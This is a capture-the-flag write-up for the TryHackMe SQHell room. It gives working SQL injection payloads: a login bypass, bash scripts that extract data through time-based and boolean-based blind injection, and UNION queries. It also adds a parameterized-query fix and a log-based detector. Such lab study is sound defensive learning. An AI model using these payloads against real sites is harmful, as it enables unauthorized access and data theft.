
TryHackMe SQHell Writeup

https://tryhackme.com/r/room/sqhell

Explore SQL injection techniques with the TryHackMe SQHell CTF challenge, a medium-level exercise. This concise write-up walks through the key SQL injection techniques the room exercises, including time-based blind injection, to help you master advanced exploitation methods.

Add Hosts

Edit the /etc/hosts file and add the following entries:

<ip> sqhell.thm

Script to add hosts automatically

ip="<ip>";domain="sqhell.thm"
sudo grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Flag 1. Authentication Bypass SQLi

http://sqhell.thm/login

' OR 1=1;--
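Why the payload above works, and what stops it, as an added example that is not part of the original write-up or of the room's own code: a string-built login query next to its parameterized form, run against a constructed in-memory SQLite table (the table, user and password are assumptions for the demonstration, not the room's schema).

```python
import sqlite3


def make_db():
    """Constructed in-memory users table for the demonstration (not the room's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the input is parsed as SQL, so a quote closes the literal,
    OR 1=1 makes the WHERE clause true for every row, and ;-- discards the password check."""
    query = ("SELECT id FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_hardened(conn, username, password):
    """Parameterized query: the same input is bound as a plain string value and can
    never change the statement's structure, so the check fails unless both values match."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR 1=1;--"   # the payload used in the Flag 1 step
    print("vulnerable login with bypass payload:", login_vulnerable(db, bypass, "wrong"))
    print("hardened login with bypass payload:  ", login_hardened(db, bypass, "wrong"))
    print("hardened login with real credentials:", login_hardened(db, "admin", "S3cret!"))
```

The only difference between the two functions is where the boundary between code and data sits: the driver substitutes bound parameters after the statement has been parsed, which is why the fix is parameterization rather than quote filtering.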

Flag 2. Time-Based SQLi

site="sqhell.thm"
characterlist="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}:"
flag=""
counter=1
while true; do
    matched=0
    for char in $(echo "$characterlist" | grep -o .); do
        # Injected through the X-Forwarded-For header; the query only sleeps when the guessed character is right
        payload="1' AND (SELECT sleep(2) FROM flag WHERE SUBSTR(flag,$counter,1) = '$char') AND '1'='1"
        start=$(date +%s)
        curl -s -o /dev/null -H "X-Forwarded-For: $payload" "http://$site"
        end=$(date +%s)
        duration=$(( end - start ))
        # A response delayed by at least the sleep() time confirms the character
        if [ "$duration" -ge 2 ]; then
            flag+="$char"
            ((counter++))
            matched=1
            echo "Current flag: $flag"
            break
        fi
    done
    # Stop if no character in the list matched; otherwise the outer loop would never end
    if [ "$matched" -eq 0 ]; then
        echo "No match at position $counter; stopping with: $flag"
        break
    fi
    if [ ${#flag} -ge 43 ]; then
        echo "The Flag is: $flag"
        break
    fi
done

Flag 3. Response-Based SQLi

Note: URL encoding in the script requires jq. Install it using your package manager; for Arch Linux, use sudo pacman -S jq.

site="sqhell.thm"
characterlist="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}:"
flag=""
counter=1
while true; do
    matched=0
    for char in $(echo "$characterlist" | grep -o .); do
        payload="admin' AND (substr((SELECT flag FROM flag LIMIT 0,1),${counter},1)) = '${char}';-- -"
        # printf rather than echo, so the trailing newline is not URL-encoded into the request
        encoded_payload=$(printf '%s' "$payload" | jq -sRr @uri)
        response=$(curl -s "http://${site}/register/user-check?username=${encoded_payload}")
        # A response containing 'false' means the injected condition held, so the guessed character is correct
        if echo "$response" | grep -q 'false'; then
            flag+="$char"
            counter=$((counter + 1))
            matched=1
            echo "Current flag: $flag"
            break
        fi
    done
    # Stop if no character in the list matched; otherwise the outer loop would never end
    if [ "$matched" -eq 0 ]; then
        echo "No match at position $counter; stopping with: $flag"
        break
    fi
    if [ ${#flag} -ge 43 ]; then
        echo "The Flag is: $flag"
        break
    fi
done

Flag 4. Union-Based SQLi

http://sqhell.thm/user?id=-1 UNION ALL SELECT "1 UNION SELECT 1,flag,3,4 FROM flag-- -",1,2 FROM users

Flag 5. Union-Based SQLi

http://sqhell.thm/post?id=-1 UNION ALL SELECT NULL,NULL,flag,NULL FROM flag-- -
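What the Flag 2 to Flag 5 traffic looks like from the server side, as an added example that is not part of the original write-up or of the room: a small detector run over constructed access-log lines (the log layout, the 1500 ms delay threshold, the signature list and the per-source threshold are all assumptions made for this demonstration). It decodes query parameters and the X-Forwarded-For header, tags each input with the injection style it matches, marks a time-based probe as confirmed when the request really was slow, and groups findings per client so the long runs of single-character probes that the extraction scripts produce stand out.

```python
import re
import urllib.parse
from collections import Counter

# Constructed sample lines (not taken from the challenge) in a simplified access-log layout:
# client ip, timestamp, request line, status, response time in ms, X-Forwarded-For value.
SAMPLE_LOG = [
    '10.0.0.5 [12/Jan/2024:10:00:01] "GET / HTTP/1.1" 200 2004 '
    '"1\' AND (SELECT sleep(2) FROM flag WHERE SUBSTR(flag,1,1) = \'T\') AND \'1\'=\'1"',
    '10.0.0.5 [12/Jan/2024:10:00:03] "GET / HTTP/1.1" 200 11 '
    '"1\' AND (SELECT sleep(2) FROM flag WHERE SUBSTR(flag,2,1) = \'A\') AND \'1\'=\'1"',
    '10.0.0.5 [12/Jan/2024:10:00:04] "GET /register/user-check?username=admin%27%20AND%20%28substr%28%28SELECT'
    '%20flag%20FROM%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%20%3D%20%27T%27%3B--%20- HTTP/1.1" 200 9 "-"',
    '10.0.0.5 [12/Jan/2024:10:00:05] "GET /user?id=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2Cflag%2CNULL'
    '%20FROM%20flag--%20- HTTP/1.1" 200 8 "-"',
    '192.168.1.20 [12/Jan/2024:10:00:06] "GET /user?id=42 HTTP/1.1" 200 7 "203.0.113.9"',
    '192.168.1.20 [12/Jan/2024:10:00:07] "POST /login HTTP/1.1" 302 15 "-"',
    '192.168.1.21 [12/Jan/2024:10:00:08] "GET /register/user-check?username=alice HTTP/1.1" 200 6 "-"',
]

# One access-log line in the layout above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<ms>\d+) "(?P<xff>[^"]*)"$'
)
# What a genuine X-Forwarded-For value looks like: a comma-separated list of IPv4/IPv6 addresses.
IP_LIST_RE = re.compile(r"^[0-9A-Fa-f.:, ]+$")

# Signatures for the injection styles used in the room, matched against decoded input values.
SQLI_PATTERNS = [
    ("time-based", re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I)),
    ("boolean-based", re.compile(r"\b(?:substr|substring|mid|ascii)\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("tautology", re.compile(r"'\s*or\s+['\d]", re.I)),
    ("comment-terminator", re.compile(r"--\s|;\s*--")),
]


def classify(value):
    """Names of the injection signatures that match one decoded input value."""
    return [name for name, rx in SQLI_PATTERNS if rx.search(value)]


def analyze(lines, slow_ms=1500):
    """Scan log lines and return one finding per suspicious input field.

    slow_ms is an assumed threshold: a time-based signature whose request also took at
    least this long is marked confirmed-delay, since the injected sleep() evidently ran.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        rec = m.groupdict()
        parsed = urllib.parse.urlsplit(rec["target"])
        fields = {}
        # Decoded query-string parameters: the id= and username= vectors.
        for key, val in urllib.parse.parse_qsl(parsed.query, keep_blank_values=True):
            fields["param:" + key] = val
        # Client-controlled headers the application stores or queries on: X-Forwarded-For here.
        if rec["xff"] not in ("", "-"):
            fields["header:x-forwarded-for"] = rec["xff"]
        for field, value in fields.items():
            kinds = classify(value)
            if field.startswith("header:") and not IP_LIST_RE.match(value):
                kinds.append("non-ip-forwarded-for")
            if "time-based" in kinds and int(rec["ms"]) >= slow_ms:
                kinds.append("confirmed-delay")
            if kinds:
                findings.append({"ip": rec["ip"], "path": parsed.path,
                                 "field": field, "kinds": sorted(kinds)})
    return findings


def suspicious_sources(findings, threshold=3):
    """Client addresses with at least `threshold` findings: character-by-character
    extraction produces long runs of near-identical requests from one source."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f["ip"], f["path"], f["field"], ",".join(f["kinds"]))
    print("sources to triage:", suspicious_sources(results))
```

Two points carry over to real logs: the X-Forwarded-For check is the cheapest signal for the Flag 2 vector, because a legitimate value is only ever a list of addresses, and the per-source count matters more than any single signature, since a blind extraction needs one request per candidate character and cannot hide that volume.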

This post is licensed under CC BY 4.0 by the author.